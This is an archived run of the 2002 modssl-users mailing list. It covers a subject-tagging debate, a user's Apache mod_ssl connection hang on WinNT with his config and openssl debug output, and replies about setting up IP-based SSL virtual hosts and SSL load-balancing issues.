Re: message headers In-Reply-To: <1012867634.3c5f22323c23e@webmail.regiocom.net> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users filter on this: To: modssl-users@modssl.org Thanks, Ron DuFresne On Tue, 5 Feb 2002, NickM wrote: > No way, thats something that problems me also. Not every emailer has > filtering, esp web email. Also it is standard practice to have a small key in > the subject for visually filtering what's what. > > It doesnt have to be big, something like [modu], and would not invade those > with filters but allow those without or not using them to have something of use. > > Thanks, Nick > > > Quoting Toomas Aas : > > > Hi Eduardo! > > > > On 4 Feb 02 at 12:12 you wrote: > > > > > Can this list implement a default header in the subject of all > > messages that > > > reads like "[modssl-users] " and THEN the subject? > > > > I prefer it the way it is. > > > > > I'm spending enough time sorting my mail box out already. > > > > Why? Most modern mail clients let you sort the incoming mail into > > folders automatically. > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 03:08:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA23877; Tue, 5 Feb 2002 03:07:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id DAA23824; Tue, 5 Feb 2002 03:06:57 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 1F5F14CE741; Tue, 5 Feb 2002 03:06:57 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g14KM1P45160; Mon, 4 Feb 2002 21:22:01 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dell.internal.totem-risk.com id TAA00142; Mon, 4 Feb 2002 19:03:51 +0100 (MET) Received: by dell.totem-risk.com with Internet Mail Service (5.5.2653.19) id ; Mon, 4 Feb 2002 18:02:44 -0000 Message-ID: From: Ken Tune To: "'modssl-users@openssl.org'" Subject: Connection hangs when using SSL Date: Mon, 4 Feb 2002 18:02:43 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1ADA6.24F61D10" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ken Tune X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1ADA6.24F61D10 Content-Type: text/plain I'm trying to get Apache up and running on WinNT, with SSL I'm using Apache/1.3.19 (Win32) mod_ssl/2.8.3 OpenSSL/0.9.6a My Apache config is as follows ... SSLMutex sem SSLRandomSeed startup builtin SSLRandomSeed connect builtin SSLSessionCache none SSLLog logs/SSL.log SSLLogLevel debug :443> ServerName SSLEngine on SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile D:/apache/ssl/my-server.cert SSLCertificateKeyFile D:/apache/ssl/my-server.key SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog logs/ssl_request_log combined My problem is that when I issue https:// through the browser the browser simply hangs - there's no response from apache. If I try and connect to 443 directly using openssl I get $ openssl s_client -connect :443 -state -debug CONNECTED(00000003) SSL_connect:before/connect initialization write to 0A01ED48 [0A01F788] (130 bytes => 130 (0x82)) 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00 ......W... ..... 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05 .........f...... 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00 ................ 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00 .e..d..c..b..a.. 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14 `...........@... 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ 0060 - 00 80 46 fe 76 0c 2a 63-8a 04 72 25 77 e3 3c 15 ..F.v.*c..r%w.<. 0070 - 22 77 46 a4 69 b9 20 85-03 7d 7b ad 85 b9 db ed "wF.i. ..}{..... 0080 - b6 1c .. SSL_connect:SSLv2/v3 write client hello A ... and nothing more. I've tried using the -ssl2 and -ssl3 flags, but get the same result. I've tried connecting using telnet and trying to speak http to the port and that doesn't work so that's not the issue. Furthermore, when I try and connect I get an entry in my ssl.log ... [04/Feb/2002 17:01:01 00193] [info] Connection to child 4 established (server :443, client ) Any suggestions gratefully received Regards Ken Tune ------_=_NextPart_001_01C1ADA6.24F61D10 Content-Type: text/html Content-Transfer-Encoding: quoted-printable Connection hangs when using SSL

I'm trying to get Apache up and running on WinNT, = with SSL

I'm using

Apache/1.3.19 (Win32)
mod_ssl/2.8.3
OpenSSL/0.9.6a

My Apache config is as follows ...

SSLMutex sem
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLSessionCache none

SSLLog logs/SSL.log
SSLLogLevel debug

<VirtualHost <MY_HOST>:443>
        = ServerName <MY_HOST>
        SSLEngine = on
        SSLCipherSuite = ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

        SSLCertificateFile D:/apache/ssl/my-server.cert
        SSLCertificateKeyFile D:/apache/ssl/my-server.key

        SetEnvIf = User-Agent ".*MSIE.*" \
          &nb= sp;  nokeepalive ssl-unclean-shutdown \
          &nb= sp;  downgrade-1.0 force-response-1.0
        CustomLog = logs/ssl_request_log combined
</VirtualHost>

My problem is that when I issue https://<MY_HOST> through the browser the = browser simply hangs  - there's no response from = apache.

If I try and connect to 443 directly using openssl I = get

$ openssl s_client  -connect  = <MY_HOST>:443 -state -debug
CONNECTED(00000003)
SSL_connect:before/connect initialization
write to 0A01ED48 [0A01F788] (130 bytes =3D> 130 = (0x82))
0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 = 00   ......W... .....
0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 = 05   .........f......
0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 = 00   ................
0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 = 00   .e..d..c..b..a..
0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 = 14   `...........@...
0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 = 02   ................
0060 - 00 80 46 fe 76 0c 2a 63-8a 04 72 25 77 e3 3c = 15   ..F.v.*c..r%w.<.
0070 - 22 77 46 a4 69 b9 20 85-03 7d 7b ad 85 b9 db = ed   "wF.i. ..}{.....
0080 - b6 = 1c           &nbs= p;           &nbs= p;           &nbs= p;         ..
SSL_connect:SSLv2/v3 write client hello A

... and nothing more.

I've tried using the -ssl2 and -ssl3 flags, but get = the same result.

I've tried connecting using telnet and trying to = speak http to the port and that doesn't work so that's not the = issue.

Furthermore, when I try and connect I get an entry in = my ssl.log ...

[04/Feb/2002 17:01:01 00193] [info]  Connection = to child 4 established (server <MY_HOST>:443, client = <MY_IP>)

Any suggestions gratefully received

Regards

Ken Tune

------_=_NextPart_001_01C1ADA6.24F61D10-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 04:06:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA26800; Tue, 5 Feb 2002 04:05:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web9406.mail.yahoo.com id EAA26619; Tue, 5 Feb 2002 04:04:14 +0100 (MET) Message-ID: <20020205030413.4458.qmail@web9406.mail.yahoo.com> Received: from [138.26.80.42] by web9406.mail.yahoo.com via HTTP; Mon, 04 Feb 2002 19:04:13 PST Date: Mon, 4 Feb 2002 19:04:13 -0800 (PST) From: suchit mishra Subject: Re: Connection hangs when using SSL To: modssl-users@modssl.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: suchit mishra X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Please refer to this tutorial. http://tud.at/programm/apache-ssl-win32-howto.php3 I got it working yesterday doing as it says. Try starting Apache as a service by typing apache -i from command prompt and see if it throws any error messages. I had the same setup as yours. Suchit --- Ken Tune wrote: > I'm trying to get Apache up and running on WinNT, > with SSL > > I'm using > > Apache/1.3.19 (Win32) > mod_ssl/2.8.3 > OpenSSL/0.9.6a > > My Apache config is as follows ... > > SSLMutex sem > SSLRandomSeed startup builtin > SSLRandomSeed connect builtin > SSLSessionCache none > > SSLLog logs/SSL.log > SSLLogLevel debug > > :443> > ServerName > SSLEngine on > SSLCipherSuite > ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > > SSLCertificateFile D:/apache/ssl/my-server.cert > SSLCertificateKeyFile D:/apache/ssl/my-server.key > > SetEnvIf User-Agent ".*MSIE.*" \ > nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 > CustomLog logs/ssl_request_log combined > > > My problem is that when I issue https:// > through the browser the > browser simply hangs - there's no response from > apache. > > If I try and connect to 443 directly using openssl I > get > > $ openssl s_client -connect :443 -state > -debug > CONNECTED(00000003) > SSL_connect:before/connect initialization > write to 0A01ED48 [0A01F788] (130 bytes => 130 > (0x82)) > 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 > 00 ......W... ..... > 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 > 05 .........f...... > 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 > 00 ................ > 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 > 00 .e..d..c..b..a.. > 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 > 14 `...........@... > 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 > 02 ................ > 0060 - 00 80 46 fe 76 0c 2a 63-8a 04 72 25 77 e3 3c > 15 ..F.v.*c..r%w.<. > 0070 - 22 77 46 a4 69 b9 20 85-03 7d 7b ad 85 b9 db > ed "wF.i. ..}{..... > 0080 - b6 1c > .. > SSL_connect:SSLv2/v3 write client hello A > > ... and nothing more. > > I've tried using the -ssl2 and -ssl3 flags, but get > the same result. > > I've tried connecting using telnet and trying to > speak http to the port and > that doesn't work so that's not the issue. > > Furthermore, when I try and connect I get an entry > in my ssl.log ... > > [04/Feb/2002 17:01:01 00193] [info] Connection to > child 4 established > (server :443, client ) > > Any suggestions gratefully received > > Regards > > Ken Tune > > __________________________________________________ Do You Yahoo!? Send FREE Valentine eCards with Yahoo! Greetings! http://greetings.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 04:38:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA27853; Tue, 5 Feb 2002 04:37:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id EAA27812; Tue, 5 Feb 2002 04:36:09 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16XwOu-0004bp-00 for modssl-users@modssl.org; Tue, 05 Feb 2002 04:36:08 +0100 To: modssl-users@modssl.org Subject: Re: message headers Message-ID: <1012880167.3c5f5327dac65@webmail.regiocom.net> Date: Tue, 05 Feb 2002 04:36:07 +0100 (CET) From: NickM References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users As just said, I do not have filtering!! The list is not high traffic enough to concern me terribly, but would be nice. Quoting "R. DuFresne" : > filter on this: To: modssl-users@modssl.org > > > Thanks, > > Ron DuFresne > > On Tue, 5 Feb 2002, NickM wrote: > > > No way, thats something that problems me also. Not every emailer has > > > filtering, esp web email. Also it is standard practice to have a > small key in > > the subject for visually filtering what's what. > > > > It doesnt have to be big, something like [modu], and would not invade > those > > with filters but allow those without or not using them to have > something of use. > > > > Thanks, Nick ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 05:07:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA29168; Tue, 5 Feb 2002 05:06:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id FAA29138; Tue, 5 Feb 2002 05:05:24 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id XAA01092; Mon, 4 Feb 2002 23:11:16 -0500 Date: Mon, 4 Feb 2002 23:11:16 -0500 (EST) From: "R. DuFresne" To: NickM cc: modssl-users@modssl.org Subject: Re: message headers In-Reply-To: <1012880167.3c5f5327dac65@webmail.regiocom.net> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thats a shortcoming on your part though, a proper mail reader can accomplish this chore. Thanks, Ron DuFresne On Tue, 5 Feb 2002, NickM wrote: > As just said, I do not have filtering!! > > The list is not high traffic enough to concern me terribly, but would be nice. > > > Quoting "R. DuFresne" : > > > filter on this: To: modssl-users@modssl.org > > > > > > Thanks, > > > > Ron DuFresne > > > > On Tue, 5 Feb 2002, NickM wrote: > > > > > No way, thats something that problems me also. Not every emailer has > > > > > filtering, esp web email. Also it is standard practice to have a > > small key in > > > the subject for visually filtering what's what. > > > > > > It doesnt have to be big, something like [modu], and would not invade > > those > > > with filters but allow those without or not using them to have > > something of use. > > > > > > Thanks, Nick > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 07:07:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA05579; Tue, 5 Feb 2002 07:06:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mag06.bb.admin.ch id HAA05539; Tue, 5 Feb 2002 07:05:25 +0100 (MET) From: Michael.Straessle@bk.admin.ch Received: from mar02.bb.admin.ch (mar02.bb.admin.ch [193.5.222.72]) by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g1565P728544 for ; Tue, 5 Feb 2002 07:05:25 +0100 (MET) Received: from mas21.bb.admin.ch (mas21.bb.admin.ch [193.5.222.82]) by mar02.bb.admin.ch (8.11.2/8.11.2) with SMTP id g1565KQ16719 for ; Tue, 5 Feb 2002 07:05:20 +0100 (MET) Received: by ad01007exc.ad.admin.ch with Internet Mail Service (5.5.2653.19) id <1GWBTR9Y>; Tue, 5 Feb 2002 07:05:20 +0100 Message-ID: To: modssl-users@modssl.org Subject: AW: Connection hangs when using SSL Date: Tue, 5 Feb 2002 07:05:17 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Michael.Straessle@bk.admin.ch X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users habe you set Listen 443 in your conf? -----Ursprungliche Nachricht----- Von: Ken Tune [mailto:ktune@totemvaluations.com] Gesendet: Montag, 4. Februar 2002 19:03 An: 'modssl-users@openssl.org' Betreff: Connection hangs when using SSL I'm trying to get Apache up and running on WinNT, with SSL I'm using Apache/1.3.19 (Win32) mod_ssl/2.8.3 OpenSSL/0.9.6a My Apache config is as follows ... SSLMutex sem SSLRandomSeed startup builtin SSLRandomSeed connect builtin SSLSessionCache none SSLLog logs/SSL.log SSLLogLevel debug :443> ServerName SSLEngine on SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile D:/apache/ssl/my-server.cert SSLCertificateKeyFile D:/apache/ssl/my-server.key SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 CustomLog logs/ssl_request_log combined My problem is that when I issue https:// through the browser the browser simply hangs - there's no response from apache. If I try and connect to 443 directly using openssl I get $ openssl s_client -connect :443 -state -debug CONNECTED(00000003) SSL_connect:before/connect initialization write to 0A01ED48 [0A01F788] (130 bytes => 130 (0x82)) 0000 - 80 80 01 03 01 00 57 00-00 00 20 00 00 16 00 00 ......W... ..... 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 07 00 00 05 .........f...... 0020 - 00 00 04 05 00 80 03 00-80 01 00 80 08 00 80 00 ................ 0030 - 00 65 00 00 64 00 00 63-00 00 62 00 00 61 00 00 .e..d..c..b..a.. 0040 - 60 00 00 15 00 00 12 00-00 09 06 00 40 00 00 14 `...........@... 0050 - 00 00 11 00 00 08 00 00-06 00 00 03 04 00 80 02 ................ 0060 - 00 80 46 fe 76 0c 2a 63-8a 04 72 25 77 e3 3c 15 ..F.v.*c..r%w.<. 0070 - 22 77 46 a4 69 b9 20 85-03 7d 7b ad 85 b9 db ed "wF.i. ..}{..... 0080 - b6 1c .. SSL_connect:SSLv2/v3 write client hello A ... and nothing more. I've tried using the -ssl2 and -ssl3 flags, but get the same result. I've tried connecting using telnet and trying to speak http to the port and that doesn't work so that's not the issue. Furthermore, when I try and connect I get an entry in my ssl.log ... [04/Feb/2002 17:01:01 00193] [info] Connection to child 4 established (server :443, client ) Any suggestions gratefully received Regards Ken Tune ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 09:38:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA11598; Tue, 5 Feb 2002 09:37:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailhost.cowan.edu.au id JAA11568; Tue, 5 Feb 2002 09:36:54 +0100 (MET) Received: from chmail.ch.ecu.edu.au (chmail.ch.ecu.edu.au [139.230.140.10]) by mailhost.cowan.edu.au (8.11.3/8.11.3) with ESMTP id g158aXo23350 for ; Tue, 5 Feb 2002 16:36:34 +0800 (WST) Received: from Churchlands Domain-MTA by chmail.ch.ecu.edu.au with Novell_GroupWise; Tue, 05 Feb 2002 16:36:31 +0800 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Tue, 05 Feb 2002 16:35:59 +0800 From: "Chris Cooper" To: Subject: Re: message headers Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Chris Cooper" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Although modification of the subject by inserting an identifier e.g. [xxx] helps when ppl BCC a copy to the list (not that that has been a problem with this list however ;-) Re, Chr!s - - - - - - Chris Cooper c.cooper@ecu.edu.au Student Service Centre webmaster@ecu.edu.au Edith Cowan University http://www.ecu.edu.au/ Pearson Street Tel: +61 8 9273 8652 Churchlands Fax: +61 8 9273 8000 - - - - - - >>> dufresne@sysinfo.com 02/05/02 12:11pm >>> Thats a shortcoming on your part though, a proper mail reader can accomplish this chore. Thanks, Ron DuFresne ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 10:00:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA12564; Tue, 5 Feb 2002 09:59:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA12535; Tue, 5 Feb 2002 09:58:43 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA13944 for ; Tue, 5 Feb 2002 09:58:35 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma013861; Tue, 5 Feb 02 09:58:26 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA20001 for ; Tue, 5 Feb 2002 09:58:25 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA16416 for ; Tue, 5 Feb 2002 09:38:01 +0100 (MET) Message-ID: <3C5F99E9.F0F057A9@bourse.ch> Date: Tue, 05 Feb 2002 09:38:01 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: ssl virtual host IP's References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sir SoilentG_kov wrote: > > I've been looking thru the mod_ssl users archives and have learned that I > can't do SSL on Virtual Hosts that are name based. I've seen that it is > possible to use it on Virtual Hosts with IP based. Correct. Also, port based... > Are these IP based hosts separate computers or can they be "Virtual IP's" > all pointing to the same computer? What I want to do is have two domain > names routed to my Linux Web Server and have them both have separate certs. > However, I have no clue how I'd go about setting up two IP's that point to > the same box... doesn't make sense to me so I'm guessing it's not > possible... but would love it if it does. It is entirely possible. Any single interface card (i.e. the physical device, e.g. eth0) can listen to many IP addresses. On an internet connected unix machine the basic procedure is: - obtain two IP addresses (on the same network - e.g. 192.168.1.1 and 192.168.1.2) - define your two sites in DNS (these two points are done via your ISP usually) - use "ifconfig" to make your NIC listen to the two IPs (see man pages for more detail on this command) - configure apache to "Listen" to the two IPs and - define two VHs for each IP e.g. Listen 192.168.1.1 ServerName www.site1.com DocumentRoot /path/to/site1 Listen 192.168.1.2 ServerName www.site2.com DocumentRoot /path/to/site2 Rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 10:21:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA14070; Tue, 5 Feb 2002 10:20:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop3.sttl.uswest.net id KAA14036; Tue, 5 Feb 2002 10:19:22 +0100 (MET) Received: (qmail 23993 invoked by alias); 5 Feb 2002 09:19:21 -0000 Delivered-To: fixup-modssl-users@modssl.org@fixme Received: (qmail 23988 invoked by uid 0); 5 Feb 2002 09:19:20 -0000 Received: from sttldslgw34poolb126.sttl.uswest.net (HELO wmtiabertj) (65.102.185.126) by sttlpop3.sttl.uswest.net with SMTP; 5 Feb 2002 09:19:20 -0000 From: "Sir SoilentG_kov" To: Subject: RE: ssl virtual host IP's Date: Tue, 5 Feb 2002 01:22:24 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: <3C5F99E9.F0F057A9@bourse.ch> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Sir SoilentG_kov" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users thanks, FYI i used Linuxconf instead of ifconfig (newbie here) and it works like a champ. Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of Owen Boyle > Sent: Tuesday, February 05, 2002 12:38 AM > To: modssl-users@modssl.org > Subject: Re: ssl virtual host IP's > > > Sir SoilentG_kov wrote: > > > > I've been looking thru the mod_ssl users archives and have > learned that I > > can't do SSL on Virtual Hosts that are name based. I've seen that it is > > possible to use it on Virtual Hosts with IP based. > > Correct. Also, port based... > > > Are these IP based hosts separate computers or can they be > "Virtual IP's" > > all pointing to the same computer? What I want to do is have two domain > > names routed to my Linux Web Server and have them both have > separate certs. > > However, I have no clue how I'd go about setting up two IP's > that point to > > the same box... doesn't make sense to me so I'm guessing it's not > > possible... but would love it if it does. > > It is entirely possible. Any single interface card (i.e. the physical > device, e.g. eth0) can listen to many IP addresses. On an internet > connected unix machine the basic procedure is: > > - obtain two IP addresses (on the same network - e.g. 192.168.1.1 and > 192.168.1.2) > - define your two sites in DNS > (these two points are done via your ISP usually) > > - use "ifconfig" to make your NIC listen to the two IPs > (see man pages for more detail on this command) > > - configure apache to "Listen" to the two IPs and > - define two VHs for each IP e.g. > > Listen 192.168.1.1 > > ServerName www.site1.com > DocumentRoot /path/to/site1 > > > Listen 192.168.1.2 > > ServerName www.site2.com > DocumentRoot /path/to/site2 > > > Rgds, > > Owen Boyle. > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 5 14:04:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA24917; Tue, 5 Feb 2002 14:03:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id OAA24879; Tue, 5 Feb 2002 14:02:29 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g15D1qv02884 for ; Tue, 5 Feb 2002 13:02:13 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id <1KWR1RH6>; Tue, 5 Feb 2002 13:04:10 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066D1E@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Apache SSL redundancy Date: Tue, 5 Feb 2002 13:04:25 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >another caveat that i've found to be problematic is when going >from http to https (or the other way round) you can lose state >as you go from one machien to the other. The load balancers do >a pretty good job of the work, however, we've definitely seen >jumpage from aol and webtv clients, as well as IIRC earthlink >and mindspring==- where the routing is complex, and there can >be multiple public IPs that a single session proxy can come >from. I've seen requests from different IPs coming in with the >same cookie or session IDs. > >it's an imperfect solution, and we're still working on ours. > >One thing i've thought of doing has been to setup a linux-vs >cluster for the straight port-forwarding, then use >apache/mod_ssl to handle the ssl negotiations, and pass it on >to the real app server with mod_proxy. I have heard that AOL change dial-up IPs every 3-4 seconds. I have no data to back this up, but considering their large user base it wouldn't be surprising as they'd need to ensure that there are no unused IPs out there (although of course a user should be able to renew the lease on the IP they already have, but there you go). So what you've observed makes some kind of sense. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the 